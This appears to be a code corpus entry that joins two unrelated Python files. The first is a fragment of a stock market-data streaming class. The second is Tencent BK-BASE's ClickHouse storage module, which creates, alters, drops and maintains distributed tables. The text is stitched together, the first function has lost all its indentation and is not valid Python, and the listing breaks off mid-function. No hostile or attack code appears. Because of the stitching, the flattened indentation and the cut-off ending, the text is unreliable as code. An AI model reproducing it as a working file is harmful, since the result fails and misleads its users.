def start_streaming_market_data(cls, timeout=300, symbols=[]):
if not symbols:
raise ValueError("Symbols can not be empty")
cls.aggregators_by_symbol = {}
cls.stop_streaming_thread = False
for symbol in symbols:
cls.aggregators_by_symbol[symbol] = DataAggregator()
async def handle_streaming_minute_agg_data(conn, channel, data):
debug("debug: ", pprint.pformat(data))
if isinstance(data, Agg):
# save_ticker_min_agg_to_json(data)
aggregator = cls.aggregators_by_symbol.get(data.symbol)
if aggregator:
aggregator.add(data)
else:
debug('No aggregator for symbol {}'.format(data.symbol))
stream_connection = StreamConn(key_id=cls.key_id, secret_key=cls.secret_key)
stream_connection.on(r'.*')(handle_streaming_minute_agg_data)
subscribe_channels = ['AM.{}'.format(symbol) for symbol in symbols]
stream_thread = threading.Thread(
target=stream_connection.run,
args=([subscribe_channels]
))
cls.stream_thread = stream_thread
cls.stream_connection = stream_connection
cls.stream_thread.start()
cls.handle_streaming_minute_agg_data = handle_streaming_minute_agg_data
@classmethod
def stop_streaming_market_data(cls):
    """Stop the streaming thread and unblock every consumer generator."""
    cls.stop_streaming_thread = True
    # Ask the connection's asyncio loop (owned by the stream thread) to stop.
    loop = cls.stream_connection.loop
    loop.call_soon_threadsafe(loop.stop)
    print('Request to stop Event Loop')
    cls.stream_thread.join()
    # A None sentinel wakes each blocked generator so it can exit cleanly.
    for consumer_queue in cls.generator_queues:
        consumer_queue.put(None)
@classmethod
def build_mins_aggregated_data_generator(cls, symbol, timeout=300):
    """Yield (time_index, row) tuples of 5-minute aggregated data for *symbol*.

    Blocks up to *timeout* seconds per item; stops on timeout or when a
    ``None`` sentinel is pushed into the queue (see stop_streaming_market_data).
    """
    feed = queue.Queue()
    cls.generator_queues.append(feed)
    # Have the symbol's aggregator push every finished 5-minute bar into feed.
    cls.aggregators_by_symbol[symbol].register('5min', feed.put)
    while True:
        print('waiting on data')
        try:
            item = feed.get(timeout=timeout)
        except queue.Empty:
            print("Timeout getting data")
            break
        if item is None:
            print('market data generator stoped')
            break
        yield (item.name, item)
|
clickhouse.py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import contextlib
import json
import threading
import time
import traceback
import kazoo.client
import kazoo.retry
from clickhouse_driver import Client
from common.log import logger
from datahub.common.const import (
APPEND_FIELDS,
AVERAGE,
BAD_FIELDS,
CAPACITY,
CHECK_DIFF,
CHECK_RESULT,
CK_DEFAULT_CONNECT_TIMEOUT_SEC,
CK_DEFAULT_SYNC_REQUEST_TIMEOUT_SEC,
CLICKHOUSE,
CLICKHOUSE_FIELDS,
CLUSTER_NAME,
CONNECTION_INFO,
CONSISTENCY,
COUNT,
DEFAULT,
DELETE_FIELDS,
DISTINCT_PARTITIONS,
DISTRIBUTED_TABLE,
ELAPSED,
EMPTY_STRING,
ENABLE,
EXCEPTION,
EXPIRES,
EXPRESSION,
FACTOR,
FIELD_NAME,
FIELD_TYPE,
FIELDS,
FREE_DISK,
GRANULARITY,
HOSTS,
HTTP_PORT,
INDEX_TYPE,
INFO,
INNER_CLUSTER,
IP,
MAX,
MESSAGE,
MIN,
NAME,
NODES,
ORDER_BY,
PARTITION_TIME,
PARTITIONS,
PHYSICAL_TABLE_NAME,
PROCESSING_TYPE,
QUERY,
QUERY_ID,
QUERYSET,
REPLICATED_TABLE,
REPORT_TIME,
RESULT_TABLE_ID,
RT_FIELDS,
SAMPLE,
SCHEMAS,
SIZE,
SNAPSHOT,
STORAGE_CLUSTER,
STORAGE_CONFIG,
STORAGE_USAGE,
STORAGES,
SUM,
TABLE,
TABLE_RECORD_NUMS,
TABLE_SIZE_MB,
TCP_TGW,
TIMESTAMP,
TOP_PARTITIONS,
TOTAL_PARTITIONS,
TOTAL_SPACE,
TOTAL_SUM,
TOTAL_USAGE,
TYPE,
USED_MAX,
USED_MIN,
USED_SPACE,
USED_SUM,
WEIGHTS,
ZK_ADDRESS,
)
from datahub.storekit import model_manager, util
from datahub.storekit.exceptions import (
ClickHouseAddIndexException,
ClickHouseConfigException,
ClickHouseDropIndexException,
ClickHousePrepareException,
ClickHouseStorageConfigException,
)
from datahub.storekit.settings import (
ADD_COLUMN_SQL,
ALTER_INDEX_SQL,
ALTER_TABLE_SQL,
ALTER_TTL_SQL,
CHECK_TABLE_EXIST_SQL,
CK_NODE_ZK_PATH_FORMAT,
CK_TB_ZK_PATH_FORMAT,
CLICKHOUSE_MAINTAIN_TIMEOUT,
CREATE_DB_SQL,
CREATE_DISTRIBUTED_TABLE_SQL,
CREATE_REPLICATED_TABLE_SQL,
DROP_COLUMN_SQL,
DROP_INDEX_SQL,
DROP_TABLE_SQL,
ENGINE_FULL_SQL,
FORMAT_READABLE_SQL,
FUSING_THRESHOLD,
ORDER_BY_SQL,
PARTITION_BY_SQL,
QUERY_ALL_CAPACITY_SQL,
QUERY_CAPACITY_BYTES_SQL,
QUERY_CAPACITY_SQL,
QUERY_CLUSTER_CAPACITY_SQL,
QUERY_CLUSTER_SQL,
QUERY_CLUSTER_TOP_PARTITIONS_SQL,
QUERY_COUNT_SQL,
QUERY_DISTINCT_PARTITIONS_SQL,
QUERY_FIELDS_SQL,
QUERY_PROCESSLIST_SQL,
QUERY_SAMPLE_SQL,
QUERY_TOP_PARTITIONS_SQL,
QUERY_TOTAL_PARTITIONS_SQL,
RT_TYPE_TO_CLICKHOUSE_MAPPING,
RTX_RECEIVER,
SAMPLE_BY_SQL,
SHOW_SCHEMA_SQL,
TRUNCATE_TABLE_SQL,
TTL_BY_SQL,
ClICKHOUSE_DEFAULT_COLUMNS,
ClICKHOUSE_EXCEPT_FIELDS,
)
from datahub.storekit.util import translate_expires_day
def initialize(rt_info):
    """Initialize the ClickHouse storage of a result table.

    :param rt_info: field and config info of the result table
    :return: result of the preparation step
    """
    # Initialization is just a full prepare (create-or-alter).
    return prepare(rt_info)
def common_initial(rt_info):
    """Build the client and table names shared by most storage operations.

    :param rt_info: basic info of the result table
    :return: (client, db_name, distributed_table, replicated_table, inner_cluster)
    """
    storage = rt_info[STORAGES][CLICKHOUSE]
    conn = json.loads(storage[STORAGE_CLUSTER][CONNECTION_INFO])
    tgw_parts = conn[TCP_TGW].split(":")
    client = build_client(tgw_parts[0], int(tgw_parts[1]))
    table_parts = storage[PHYSICAL_TABLE_NAME].split(".")
    db_name, distributed_table = table_parts[0], table_parts[1]
    # The local replicated table follows the "<distributed>_local" convention.
    return client, db_name, distributed_table, f"{distributed_table}_local", conn[INNER_CLUSTER]
def build_client(host, port, database=DEFAULT, user=DEFAULT,
                 connect_timeout=CK_DEFAULT_CONNECT_TIMEOUT_SEC,
                 sync_request_timeout=CK_DEFAULT_SYNC_REQUEST_TIMEOUT_SEC):
    """Create a clickhouse-driver client.

    :param host: hostname or ip
    :param port: ck server port
    :param database: database name
    :param user: user name
    :param connect_timeout: connection timeout
    :param sync_request_timeout: ping request timeout
    :return: a Client instance
    """
    return Client(host=host,
                  port=port,
                  database=database,
                  user=user,
                  connect_timeout=connect_timeout,
                  sync_request_timeout=sync_request_timeout)
def info(rt_info):
    """Collect ClickHouse storage info of a result table.

    Gathers table schemas, fields, sample data, per-node partition info,
    capacity info and a cross-node table-consistency check.

    :param rt_info: field and config info of the result table
    :return: the clickhouse storage dict with an INFO entry filled in
    """
    client, db_name, distributed_table, replicated_table, _ = common_initial(rt_info)
    result = {}
    try:
        # schema of the replicated (local) table
        sql = SHOW_SCHEMA_SQL.format(db_name, replicated_table)
        result[REPLICATED_TABLE] = get_table_schema(client, sql)
        # field name/type pairs of the table
        sql = QUERY_FIELDS_SQL.format(db_name, replicated_table)
        result[FIELDS] = [f"{cell[0]}:{cell[1]}" for cell in client.execute(sql)]
        # schema of the distributed table
        sql = SHOW_SCHEMA_SQL.format(db_name, distributed_table)
        result[DISTRIBUTED_TABLE] = get_table_schema(client, sql)
        # sample rows
        sql = QUERY_SAMPLE_SQL.format(db_name, distributed_table)
        result[SAMPLE] = client.execute(sql)
        # row count
        sql = QUERY_COUNT_SQL.format(db_name, distributed_table)
        result[COUNT] = client.execute(sql)[0][0]
        # per-node data size of the table
        result[SIZE] = table_capacity(client, db_name, replicated_table)
        # per-node partition stats
        result[PARTITIONS] = table_partitions(client, db_name, replicated_table)
        # cross-node schema consistency check
        result[CONSISTENCY] = check_table_consistency(client, db_name, distributed_table, replicated_table)
    except Exception as e:
        logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to get info", exc_info=True)
        result[EXCEPTION] = str(e)
    finally:
        client.disconnect()
    ck = rt_info[STORAGES][CLICKHOUSE]
    ck[INFO] = result
    return ck
def get_table_schema(client, sql):
    """Run a SHOW CREATE style query and return the schema as one line.

    :param client: clickhouse client
    :param sql: query whose result carries the schema in row 0, column 0
    :return: schema string with newlines collapsed to spaces
    """
    raw_schema = client.execute(sql)[0][0]
    return raw_schema.replace("\n", " ")
def get_all_table_capacity(conn):
    """Read size info of every *_local table in a ClickHouse cluster.

    :param conn: cluster connection info
    :return: {"db.table": {table_size_mb, table_record_nums, report_time}}
    """
    host, port = conn[TCP_TGW].split(":")[0], int(conn[TCP_TGW].split(":")[1])
    client = build_client(host, port)
    try:
        resultSet = client.execute(QUERY_CLUSTER_SQL)
        rt_size = {}
        # Visit every node and accumulate size/row counts per physical table.
        for re in resultSet:
            host, port = re[0], int(re[1])
            inner_client = build_client(host, port)
            try:
                size_info = inner_client.execute(QUERY_ALL_CAPACITY_SQL)
                for info in size_info:
                    db, table, total_bytes, total_rows = info[0], info[1], int(info[2]), int(info[3])
                    physical_tn = f"{db}.{table}"
                    if physical_tn in rt_size:
                        rt_size[physical_tn][TABLE_SIZE_MB] += total_bytes / 1024 / 1024
                        # NOTE(review): rows are halved — presumably because each
                        # row exists on two replicas; confirm the replica count.
                        rt_size[physical_tn][TABLE_RECORD_NUMS] += total_rows / 2
                    else:
                        rt_size[physical_tn] = {
                            TABLE_SIZE_MB: total_bytes / 1024 / 1024,
                            TABLE_RECORD_NUMS: total_rows / 2,
                            REPORT_TIME: time.time(),
                        }
            finally:
                inner_client.disconnect()
        return rt_size
    finally:
        client.disconnect()
def table_capacity(client, db_name, replicated_table):
    """Collect the table's data size on every server of the cluster.

    :param replicated_table: local replicated table
    :param client: clickhouse client
    :param db_name: database name
    :return: per-instance capacity plus max/min/sum/average over all nodes
    """
    capacity = {}
    capacity_bytes = []
    resultSet = client.execute(QUERY_CLUSTER_SQL)
    for re in resultSet:
        host, port = re[0], int(re[1])
        inner_client = build_client(host, port)
        try:
            # human-readable size for the report, raw bytes for the aggregates
            sql = QUERY_CAPACITY_SQL.format(db_name, replicated_table)
            instance = f"{host}:{port}"
            capacity[instance] = inner_client.execute(sql)[0][0]
            sql = QUERY_CAPACITY_BYTES_SQL.format(db_name, replicated_table)
            capacity_bytes.append(float(inner_client.execute(sql)[0][0]))
        finally:
            inner_client.disconnect()
    size = len(capacity_bytes)
    capacity_max, capacity_min, capacity_sum, capacity_average = 0, 0, 0, 0
    if size > 0:
        capacity_max = format_readable_size(client, max(capacity_bytes))
        capacity_min = format_readable_size(client, min(capacity_bytes))
        capacity_sum = format_readable_size(client, sum(capacity_bytes))
        capacity_average = format_readable_size(client, sum(capacity_bytes) / size)
    return {CAPACITY: capacity, MAX: capacity_max, MIN: capacity_min, SUM: capacity_sum, AVERAGE: capacity_average}
def format_readable_size(client, size):
    """Convert a byte count to a human-readable size via ClickHouse.

    :param client: clickhouse client
    :param size: size in bytes
    :return: human-readable size string
    """
    return client.execute(FORMAT_READABLE_SQL.format(size))[0][0]
def cluster_processlist(cluster_name):
    """Fetch the ten longest currently-running queries on every node.

    :param cluster_name: clickhouse cluster name
    :return: {"host:port": [running query info, ...]}
    """
    client = cluster_common_initial(cluster_name)
    processlist = {}
    try:
        resultSet = client.execute(QUERY_CLUSTER_SQL)
        for re in resultSet:
            host, port = re[0], int(re[1])
            inner_client = build_client(host, port)
            try:
                instance = f"{host}:{port}"
                processlist[instance] = get_processlist(inner_client)
            finally:
                inner_client.disconnect()
    finally:
        client.disconnect()
    return processlist
def top_partitions(cluster_name):
    """Fetch the ten partitions with the most parts on every node.

    :param cluster_name: clickhouse cluster name
    :return: {"host:port": [partition descriptions]}
    """
    client = cluster_common_initial(cluster_name)
    top_partitions = {}
    try:
        resultSet = client.execute(QUERY_CLUSTER_SQL)
        for result in resultSet:
            host, port = result[0], int(result[1])
            inner_client = build_client(host, port)
            try:
                reSet = inner_client.execute(QUERY_CLUSTER_TOP_PARTITIONS_SQL)
                top_parts = [f"{r[0]} {r[1]} {r[2]}.{r[3]}" for r in reSet]
                instance = f"{host}:{port}"
                top_partitions[instance] = top_parts
            finally:
                inner_client.disconnect()
    finally:
        client.disconnect()
    return top_partitions
def get_processlist(client):
    """Return the longest currently-running queries on one node.

    :param client: clickhouse client
    :return: list of {query_id, query, elapsed} dicts
    """
    return [
        {QUERY_ID: row[0], QUERY: row[1], ELAPSED: row[2]}
        for row in client.execute(QUERY_PROCESSLIST_SQL)
    ]
def cluster_capacity(cluster_name):
    """Collect disk capacity of every node in a cluster.

    :param cluster_name: cluster name
    :return: per-instance capacity plus aggregate usage stats
    """
    capacity = {}
    capacity_usage = []
    capacity_used = []
    capacity_total = []
    client = cluster_common_initial(cluster_name)
    try:
        resultSet = client.execute(QUERY_CLUSTER_SQL)
        for re in resultSet:
            host, port = re[0], int(re[1])
            inner_client = build_client(host, port)
            try:
                result = inner_client.execute(QUERY_CLUSTER_CAPACITY_SQL)
                free_space, total_space = int(result[0][0]), int(result[0][1])
                used_space = total_space - free_space
                storage_usage = 100 * used_space / total_space
                capacity_used.append(used_space)
                capacity_total.append(total_space)
                capacity_usage.append(storage_usage)
                instance = f"{host}:{port}"
                capacity[instance] = {
                    USED_SPACE: format_readable_size(inner_client, used_space),
                    TOTAL_SPACE: format_readable_size(inner_client, total_space),
                    STORAGE_USAGE: storage_usage,
                }
            finally:
                inner_client.disconnect()
        # aggregate over all visited nodes (zeros when the cluster is empty)
        size = len(capacity_total)
        used_sum, usage_max, usage_min, total_usage, total_sum = 0, 0, 0, 0, 0
        if size > 0:
            usage_max, usage_min = max(capacity_usage), min(capacity_usage)
            used_sum = sum(capacity_used)
            total_sum = sum(capacity_total)
            total_usage = 100 * sum(capacity_used) / sum(capacity_total)
        return {
            CAPACITY: capacity,
            USED_MAX: usage_max,
            USED_MIN: usage_min,
            USED_SUM: used_sum,
            TOTAL_SUM: total_sum,
            TOTAL_USAGE: total_usage,
            TIMESTAMP: time.time(),
        }
    finally:
        client.disconnect()
def cluster_common_initial(cluster_name):
    """Create a client for a named ClickHouse cluster.

    :param cluster_name: cluster name
    :return: clickhouse client
    """
    cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, CLICKHOUSE)
    conn = json.loads(cluster.connection_info)
    tgw_parts = conn[TCP_TGW].split(":")
    return build_client(tgw_parts[0], int(tgw_parts[1]))
def table_partitions(client, db_name, replicated_table):
    """Collect partition stats of the table on every server.

    :param replicated_table: local replicated table
    :param client: clickhouse client
    :param db_name: database name
    :return: {"host:port": {distinct/total partition counts, top partitions}}
    """
    partitions = {}
    resultSet = client.execute(QUERY_CLUSTER_SQL)
    for result in resultSet:
        part = {}
        host, port = result[0], int(result[1])
        inner_client = build_client(host, port)
        try:
            sql = QUERY_DISTINCT_PARTITIONS_SQL.format(db_name, replicated_table)
            part[DISTINCT_PARTITIONS] = inner_client.execute(sql)[0][0]
            sql = QUERY_TOTAL_PARTITIONS_SQL.format(db_name, replicated_table)
            part[TOTAL_PARTITIONS] = inner_client.execute(sql)[0][0]
            sql = QUERY_TOP_PARTITIONS_SQL.format(db_name, replicated_table)
            part[TOP_PARTITIONS] = [f"{r[0]} {r[1]} {r[2]}.{r[3]}" for r in inner_client.execute(sql)]
            partitions[f"{host}:{port}"] = part
        finally:
            inner_client.disconnect()
    return partitions
def alter_table(rt_info):
    """Alter the rt's ClickHouse storage: add/drop columns and update the TTL.

    :param rt_info: field and config info of the result table
    :return: alteration result of the clickhouse storage
    """
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        # diff rt fields against the physical table and apply column changes
        field_diff = check_schema(rt_info)
        append_fields, delete_fields = field_diff[CHECK_DIFF][APPEND_FIELDS], field_diff[CHECK_DIFF][DELETE_FIELDS]
        if append_fields or delete_fields:
            alter_fields(
                client, db_name, distributed_table, replicated_table, inner_cluster, append_fields, delete_fields
            )
        # update the table TTL
        set_expire(
            client,
            db_name,
            replicated_table,
            inner_cluster,
            rt_info[PROCESSING_TYPE],
            rt_info[STORAGES][CLICKHOUSE][EXPIRES],
        )
        check_tables(client, db_name, distributed_table, replicated_table)
    except Exception as e:
        # BUG FIX: the message previously said "failed to create table",
        # copied from create_table(); this function alters the table.
        logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to alter table", exc_info=True)
        raise e
    finally:
        client.disconnect()
def set_expire(client, db_name, replicated_table, inner_cluster, processing_type, expire):
    """Apply the table TTL rule when it is not already present.

    :param replicated_table: local replicated table
    :param client: clickhouse client
    :param db_name: database name
    :param inner_cluster: inner logical cluster of the ck cluster
    :param processing_type: processing_type of the rt
    :param expire: data retention period of the table
    """
    # querysets and snapshots carry no TTL
    if processing_type in [QUERYSET, SNAPSHOT]:
        return
    expire_days = translate_expires_day(expire)
    if expire_days <= 0:
        return
    ttl_by = TTL_BY_SQL.format(expire_days)
    sql = ENGINE_FULL_SQL.format(db_name, replicated_table)
    engine_full = get_table_schema(client, sql)
    # only ALTER when the desired TTL clause is not already in the engine definition
    if ttl_by not in engine_full:
        sql = ALTER_TTL_SQL.format(db_name, replicated_table, inner_cluster, expire_days)
        client.execute(sql)
def check_tables(client, db_name, distributed_table, replicated_table):
    """Validate tables across nodes: existence and schema consistency.

    :param replicated_table: local replicated table
    :param distributed_table: global distributed table
    :param client: clickhouse client
    :param db_name: database name
    :raises ClickHousePrepareException: when a table is missing or schemas differ
    """
    # verify the tables were created successfully and are consistent
    created = check_table_exists(client, db_name, distributed_table, replicated_table)
    consistency = check_table_consistency(client, db_name, distributed_table, replicated_table)[CONSISTENCY]
    if not (created and consistency):
        raise ClickHousePrepareException(message=f"是否建表成功: {created}, 各表是否一致: {consistency}")
def alter_fields(client, db_name, distributed_table, replicated_table, inner_cluster, append_fields, delete_fields):
    """Add and drop columns on both the replicated and distributed tables.

    :param replicated_table: local replicated table
    :param distributed_table: global distributed table
    :param client: clickhouse client
    :param db_name: database name
    :param inner_cluster: inner logical cluster of the ck cluster
    :param append_fields: columns to add
    :param delete_fields: columns to drop
    """
    clauses = [ADD_COLUMN_SQL.format(field) for field in append_fields]
    clauses += [DROP_COLUMN_SQL.format(field) for field in delete_fields]
    alter = ", ".join(clauses)
    # Apply the same ALTER first to the local replicated table, then to the
    # cluster-wide distributed table.
    for table in (replicated_table, distributed_table):
        client.execute(ALTER_TABLE_SQL.format(db_name, table, inner_cluster, alter))
def create_table(rt_info):
    """Create the physical ClickHouse tables (distributed + replicated).

    Rules: when the dteventtimestamp field exists, a __time column is added and
    ttl / partition by / order by / sample by are based on __time; otherwise
    only order by is set (no ttl, sample by or partition by).

    :param rt_info: field and config info of the result table
    :return: execution result
    """
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        rt_id = rt_info[RESULT_TABLE_ID]
        ck = rt_info[STORAGES][CLICKHOUSE]
        storage_config = json.loads(ck[STORAGE_CONFIG])
        processing_type = rt_info[PROCESSING_TYPE]
        rt_fields = rt_info[FIELDS]
        # create the database
        sql = CREATE_DB_SQL.format(db_name, inner_cluster)
        client.execute(sql)
        # create the replicated table; order_by must be configured and every
        # listed column must exist among the rt fields
        order_list = [e.lower() for e in storage_config.get(ORDER_BY, "")]
        field_name_list = construct_fields(rt_fields, processing_type, True)
        if not order_list or not set(order_list).issubset(field_name_list):
            raise ClickHouseStorageConfigException("order_by必须设置,且字段存在")
        fields = ", ".join(construct_fields(rt_fields, processing_type))
        if processing_type in [QUERYSET, SNAPSHOT]:
            order_by = ORDER_BY_SQL.format(", ".join(order_list))  # in-partition sort order / primary key
            partition_by = EMPTY_STRING
            sample_by = EMPTY_STRING
            ttl_by = EMPTY_STRING  # data retention clause
        else:
            order_list.insert(0, PARTITION_TIME)
            order_by = ORDER_BY_SQL.format(", ".join(order_list))
            partition_by = PARTITION_BY_SQL
            sample_by = SAMPLE_BY_SQL
            ttl_by = TTL_BY_SQL.format(translate_expires_day(ck[EXPIRES]))
        sql = CREATE_REPLICATED_TABLE_SQL.format(
            db_name,
            replicated_table,
            inner_cluster,
            fields,
            db_name,
            replicated_table,
            order_by,
            partition_by,
            sample_by,
            ttl_by,
        )
        logger.info(f"{rt_id}: create clickhouse replicated_table: {sql}")
        client.execute(sql)
        # create the distributed table
        sql = CREATE_DISTRIBUTED_TABLE_SQL.format(
            db_name, distributed_table, inner_cluster, fields, inner_cluster, db_name, replicated_table
        )
        logger.info(f"{rt_id}: create clickhouse distributed_table: {sql}")
        client.execute(sql)
        check_tables(client, db_name, distributed_table, replicated_table)
    except Exception as e:
        logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to create table", exc_info=True)
        raise e
    finally:
        client.disconnect()
def prepare(rt_info):
    """Prepare the rt's ClickHouse storage (create tables or alter old ones).

    1) create: when the distributed or replicated table is missing on any node,
       tables are created from the rt config (note: a renamed replicated table
       cannot be handled);
    2) alter: when rt fields changed, the physical columns follow; when the
       retention period changed, the table TTL follows.

    :param rt_info: rt config info
    :return: True/False
    """
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        if not check_table_exists(client, db_name, distributed_table, replicated_table):
            create_table(rt_info)
        else:
            alter_table(rt_info)
        # sync the host whitelist to zookeeper
        sync_zk_table_whitelist(rt_info)
        return True
    except Exception as e:
        logger.warning(f"{rt_info[RESULT_TABLE_ID]}: failed to prepare", exc_info=True)
        raise e
    finally:
        client.disconnect()
def maintain(rt_info):
    """Maintain the retention period (TTL) of the clickhouse table.

    :param rt_info: rt config info
    """
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        set_expire(
            client,
            db_name,
            replicated_table,
            inner_cluster,
            rt_info[PROCESSING_TYPE],
            rt_info[STORAGES][CLICKHOUSE][EXPIRES],
        )
    except Exception as e:
        logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to maintain", exc_info=True)
        raise e
    finally:
        client.disconnect()
def maintain_all():
    """Maintain data-retention rules of all clickhouse clusters in parallel.

    One worker thread per cluster; each is joined with a bounded timeout so a
    stuck cluster cannot block the whole maintenance run forever.

    :return: True
    """
    start = time.time()
    cluster_list = model_manager.get_storage_cluster_configs_by_type(CLICKHOUSE)
    check_threads = []
    for cluster in cluster_list:
        cluster_name = cluster[CLUSTER_NAME]
        thread = threading.Thread(target=maintain_clickhouse_cluster, name=cluster_name, args=(cluster_name,))
        # daemon threads die with the main thread
        # FIX: Thread.setDaemon() is deprecated (removal planned); assign the
        # daemon attribute instead.
        thread.daemon = True
        check_threads.append(thread)
        thread.start()
    for th in check_threads:
        th.join(timeout=CLICKHOUSE_MAINTAIN_TIMEOUT)
    end = time.time()
    logger.info(f"clickhouse maintain_all total time: {(end - start)}(s)")
    return True
def maintain_clickhouse_cluster(cluster_name):
    """Maintain every result table stored on a single clickhouse cluster.

    Failures are logged per table and do not abort the loop.

    :param cluster_name: cluster name
    """
    storage_rt_list = model_manager.get_storage_rt_objs_by_name_type(cluster_name, CLICKHOUSE)
    for rt_storage in storage_rt_list:
        try:
            rt_info = util.get_rt_info(rt_storage.result_table_id)
            maintain(rt_info)
        except Exception as e:
            logger.warning(
                f"{rt_storage.storage_cluster_config.cluster_name}: failed to maintain the retention rule of "
                f"datasource {rt_storage.physical_table_name}, exception: {str(e)}"
            )
def construct_fields(rt_fields, processing_type, only_name=False):
    """Translate RT field definitions into ClickHouse column definitions.

    :param only_name: when True, return only the column names
    :param processing_type: source type of the rt (snapshot, clean, batch, ...)
    :param rt_fields: field info of the result table
    :return: list of "name type" strings, or just names when only_name is set
    """
    keep_all = processing_type in [QUERYSET, SNAPSHOT]
    columns = []
    for field in rt_fields:
        name = field[FIELD_NAME].lower()
        # For non queryset/snapshot tables the internal/system columns are
        # excluded here and the default columns appended below instead.
        if not keep_all and name in ClICKHOUSE_EXCEPT_FIELDS:
            continue
        columns.append(f"{name} {RT_TYPE_TO_CLICKHOUSE_MAPPING[field[FIELD_TYPE].lower()]}")
    if not keep_all:
        columns = columns + ClICKHOUSE_DEFAULT_COLUMNS
    if only_name:
        return [column.split(" ")[0] for column in columns]
    return columns
def delete(rt_info, delete_schema=True):
    """Clear table data, optionally dropping the table schemas as well.

    :param delete_schema: whether to drop the table schemas
    :param rt_info: result table info
    :return: True on success (for drops, True once the tables are gone)
    """
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        if delete_schema:
            # drop both the distributed and the replicated table
            sql = DROP_TABLE_SQL.format(db_name, distributed_table, inner_cluster)
            client.execute(sql)
            sql = DROP_TABLE_SQL.format(db_name, replicated_table, inner_cluster)
            client.execute(sql)
            return not check_table_exists(client, db_name, distributed_table, replicated_table)
        else:
            # keep the schema, only truncate the data
            sql = TRUNCATE_TABLE_SQL.format(db_name, replicated_table, inner_cluster)
            client.execute(sql)
            return True
    except Exception as e:
        logger.warning(f"{rt_info[RESULT_TABLE_ID]}: drop or truncate table failed", exc_info=True)
        raise e
    finally:
        client.disconnect()
def add_index(rt_info, params):
    """Create a data-skipping index on the replicated table.

    :param rt_info: result table info
    :param params: index parameters (name, expression, index_type, granularity)
    :return: True on success
    :raises ClickHouseAddIndexException: when the ALTER fails
    """
    index_name, expression, index_type, granularity = (
        params[NAME],
        params[EXPRESSION],
        params[INDEX_TYPE],
        params[GRANULARITY],
    )
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        sql = ALTER_INDEX_SQL.format(
            db_name, replicated_table, inner_cluster, index_name, expression, index_type, granularity
        )
        logger.info(f"{rt_info[RESULT_TABLE_ID]}: going to add index, sql: {sql}")
        client.execute(sql)
        return True
    except Exception as e:
        logger.warning(f"{rt_info[RESULT_TABLE_ID]}: add index failed", exc_info=True)
        raise ClickHouseAddIndexException(message_kv={MESSAGE: str(e)})
    finally:
        client.disconnect()
def drop_index(rt_info, index_name):
    """Drop a data-skipping index from the replicated table.

    (The original docstring said "create" — copy-paste from add_index.)

    :param rt_info: result table info
    :param index_name: index name
    :return: True on success
    :raises ClickHouseDropIndexException: when the ALTER fails
    """
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        sql = DROP_INDEX_SQL.format(db_name, replicated_table, inner_cluster, index_name)
        logger.info(f"{rt_info[RESULT_TABLE_ID]}: going to drop index, sql: {sql}")
        client.execute(sql)
        return True
    except Exception as e:
        logger.warning(f"{rt_info[RESULT_TABLE_ID]}: drop index failed", exc_info=True)
        raise ClickHouseDropIndexException(message_kv={MESSAGE: str(e)})
    finally:
        client.disconnect()
def check_table_exists(client, db_name, distributed_table, replicated_table):
    """Check that both tables exist on every node of the cluster.

    A table missing on any single node counts as missing overall.

    :param replicated_table: local replicated table
    :param distributed_table: global distributed table
    :param client: clickhouse client
    :param db_name: database name
    :return: True/False
    """
    nodes = client.execute(QUERY_CLUSTER_SQL)
    return all(
        table_exists(node[0], int(node[1]), db_name, distributed_table, replicated_table)
        for node in nodes
    )
def table_exists(host, port, db_name, distributed_table, replicated_table):
    """Check whether both tables exist on one node.

    :param host: host
    :param port: port
    :param replicated_table: local replicated table
    :param distributed_table: global distributed table
    :param db_name: database name
    :return: True when both tables exist on the node
    """
    client = None
    try:
        client = build_client(host, port)
        sql = CHECK_TABLE_EXIST_SQL.format(db_name, distributed_table, replicated_table)
        # the query returns one row per existing table; both must be present
        if len(client.execute(sql)) != 2:
            return False
    finally:
        # BUG FIX: the original condition was inverted (`if not client`), which
        # leaked every successfully-built connection and would have called
        # disconnect() on None had build_client() raised.
        if client:
            client.disconnect()
    return True
def check_table_consistency(client, db_name, distributed_table, replicated_table):
    """Verify the table schemas are identical across every node.

    :param replicated_table: local replicated table
    :param distributed_table: global distributed table
    :param client: clickhouse client
    :param db_name: database name
    :return: {CONSISTENCY: bool, SCHEMAS: {"host:port": {table: schema}}}
    """
    resultSet = client.execute(QUERY_CLUSTER_SQL)
    schemas = {}
    distributed_schemas = set()
    replicated_schemas = set()
    for result in resultSet:
        host, port = result[0], int(result[1])
        inner_client = build_client(host, port)
        try:
            program = f"{host}:{port}"
            schemas[program] = {}
